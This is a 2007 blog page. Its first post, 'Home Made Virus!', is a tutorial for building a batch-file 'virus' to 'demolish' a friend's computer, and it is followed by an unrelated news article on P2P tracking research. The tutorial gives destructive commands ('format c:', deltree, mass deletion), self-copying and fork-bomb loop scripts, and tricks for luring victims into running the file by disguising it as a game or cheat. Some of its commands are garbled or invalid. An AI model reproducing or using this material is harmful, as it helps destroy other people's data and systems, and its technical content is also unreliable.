Saturday, November 24, 2007

Home Made Virus!

Do you Hate your friend? Want to demolish his computer?

Then you got to do this.....!!!

Here are some steps to create a Virus. Yes, that Computer virus that INFECTS the Computer.

Use any Text Editor.

Index

1. Tools

2. What makes a virus a virus?

3. Making your first batch file

4. Making a batch virus

5. Destructive commands

6. Most common tricks used to make someone open the file


Go on step by step

1. Tools

To make a batch program you will need a text program (ex. Word, Notepad, WordPad, etc…) A keyboard if you don’t have one you can use the ON-screen keyboard.

To get to the on-screen keyboard, Go to:

Start è All Programs è Accessories è Accessibility

2. What makes a virus a virus?

When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies itself to other cells because it can’t live without a host. Same with the computer virus. Without a file or a program a virus can’t be made. So all the computer viruses are a program that copies itself, but some people put destructive code in it.

3. Making a Batch file

I’m going to use notepad you can use what ever you want.

We are also going to make a “Hello World” Application that is the first program you make in any language. When making a batch file you are always going to use this line first

@echo off

You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer. You can experiment a little if you want.

Now we are going to make it say Hello World. To do this we need a ‘echo’ command which looks like this -

echo

This tells the program to write something. Since we want it to say Hello World we are going to type Hello World next to echo to make it look like this -

echo Hello World

So at this point you should have -

@echo off

echo Hello World

Now go to file save and name it ‘test.bat’. (You can name it whatever you want as long as it has .bat at the end.) Save it to the desktop so you can get to it faster. Then run it. You should have a black box open and close really fast. To fix this we need a ‘pause’ command and we will also need a ‘goto’ command. The goto command is the most important command. If you don't know, the goto command tells where to go to next. Since we need a pause command we want it to go to pause so we need to write goto pause like this -

goto pause

Now u should have -

@echo off

echo Hello World

goto pause

Now we need a subsection name pause. You make a sub section by putting a ‘ : ‘ (colon) by the first word like this -

:start

or

:end

But we said go to pause so we need one name pause like this

pause

then under that we are going to write pause

pause

pause

This just makes it were it will keep the box open till you press a key

Optional

At the end you can put a ‘exit’ at the end of pause where the goto command should go, but you don’t have to.

Save and run it now. You should be able to read your text now.

4. Making a Batch file into a virus

This is a lot easier then some people think. To make a virus you just need the ‘copy’ command which looks like this -

copy

So let’s make a new one. By reading Section 3 you should know you need the @echo off

@echo off

copy

All right we are going to name this file first and we are going to make it copy itself to C:\WINDOWS just because no one looks in their. This is what it looks like (I will explain it). -

@echo off

copy first C:\WINDOWS

copy - tells it to copy

first - is just the name of the file we want to copy

C:\WINDOWS - is the place you want to copy to

That is a virus!

5. Destructive commands

If you get pissed at someone you might want to send him something to mess with him. Here are some commands to add to the virus.

del - this deletes the files.

del file name

del (.txt*)

The (.txt*) would delete all txt files on the computer. The * at the end just means all instead of a file called .txt

deltree - this deletes the whole folder.

You can remember it like this -

Think of a tree. If you type ‘del’ you are only deleting a part of the tree, but if you type ‘deltree’ you are deleting the whole tree.

format - this deletes everything.

format c:

this delets everything in the c drive

open - This is just fun to use to scare some one but not do damage to something

open - name of file type, like to open notepad type -

open notepad

To open Microsoft Paint type -

open mspaint

Just put a crap load in their. Also, the next one that can be very useful is looping. This will make the file repeat itself till it is shut off. Say your first sub section is called start. You would just make the goto command to go to start like -

@echo off

:start

start notepad

goto start

That will open notepad over and over and if they don’t close it, it can crash their computer. To open the command window you have to use ‘var’. like %% (not going to explain var. it would be confusing)

@echo off

:whatever

start %0

goto whatever

This will open the black box over and over.

6. Most common tricks

People we will put it in a folder with a couple of readme documents, and call it a game. We will say - Check this out it is so cool!

OR

We will say - check out this hack or cheat I found for this game

Send them a zip file, and tell them to unzip.

Examples

For just a simple message it is -

@echo off

echo *insert MSG here*

goto pause

ause

pause

For the a rapid command prompt type screen it is -

@echo off

:whatever

start %0

goto whatever

For rapid note pad it is -

@echo off

:start

start notepad

goto start

For rapid ms paint it is -

@echo off

:start

start ms paint

goto start

Quite Long but good to try...



Technorati

Technorati Profile

Friday, October 26, 2007

P2P researchers: use a blocklist or you will be tracked... 100% of the time

The old cliché "You're not paranoid if they really are out to get you" turns out to apply quite nicely to the world of P2P file-sharing. A trio of intrepid researchers from the University of California-Riverside decided to see just how often a P2P user might be tracked by content owners. Their startling conclusion: "naive" users will exchange data with such "fake users" 100 percent of the time.

Anirban Banerjee, Michalis Faloutsos, and Laxmi Bhuyan collected more than 100GB of TCP header information from P2P networks back in early 2006 using a specially-doctored client. The goal of the research was a simple one: to determine "how likely is it that a user will run into such a 'fake user' and thus run the risk of a lawsuit?" The results are outlined in a recent paper (PDF), "P2P: Is Big Brother Watching You?"

For years, P2P communities have suspected that affiliates of the RIAA, the MPAA, and others have been haunting P2P networks to look for those who might be swapping copyrighted files. It's more than a hunch; it's well documented that companies like SafeNet (formerly Media Sentry) engage in this sort of work, and that their testimony is routinely produced at trials. It helped to bring down Jammie Thomas, in fact.

But identifying these organizations is hard. The nature of their business is to remain shadowy, but P2P advocates have spent years compiling "blocklists" of IP ranges that are suspected of belonging to such companies. Connect to a "user" who has an IP address in one of the blocklists and bam: you've just been tracked swapping a file.

By parsing all of the TCP headers that they collected over the course of 90 days, the UC-Riverside researchers came to several conclusions:

  1. If you don't use a blocklist, you will be tracked. Every one of the researchers' test clients that did not use a blocklist soon connected to an IP address found within those lists. It turns out that 12 to 17 percent of all IP addresses on the network belonged to these blocklisted ranges.
  2. Trackers aren't that hard to avoid. While "naive" clients may all connect to blocklisted users, it wasn't that hard to stay away from the vast majority of such "fake users." Researchers found that "avoiding just the top 5 blocklisted IPs reduces the chance of being tracked to about 1 percent."
  3. Content owners hide their tracks. Much of this tracking work is farmed out from content owners to companies like SafeNet and BayTSP, and these companies in turn take care to hide their tracks. When the researchers ran reverse DNS lookups on the blocklisted ranges, they found that only 0.5 percent of those addresses resolved back to media companies in an obvious way.
  4. Meet the BOGONS. One of the strategies for remaining anonymous is to operate from BOGON IP ranges. These ranges are unallocated blocks of addresses that should ordinarily not be used on the public Internet. Of the top fifteen blocklist entities that were discovered during testing, 12 were in BOGON ranges. The researchers note that "these sources deliberately wish to conceal their identities while serving files on P2P networks," and reverse DNS queries on these addresses produce little useful information.

The takeaway here is simple: P2P users who don't utilize the blocklists are just about guaranteed to be tracked by "fake users" operating out of those ranges, and thus seem to open the door to possible litigation should the dice be rolled against them.

The study does have one major caveat, however; it does not attempt to determine if the blocklists actually correspond to tracking organizations like SafeNet. The researchers note that "this would be interesting and challenging future work." While using a blocklist makes it easy to avoid connecting to IP addresses found on that list, it's not clear that every range on the lists is really a tracker. Conversely, there's no way to know if addresses not on the list might in fact be tracking users.

- Nate Anderson Source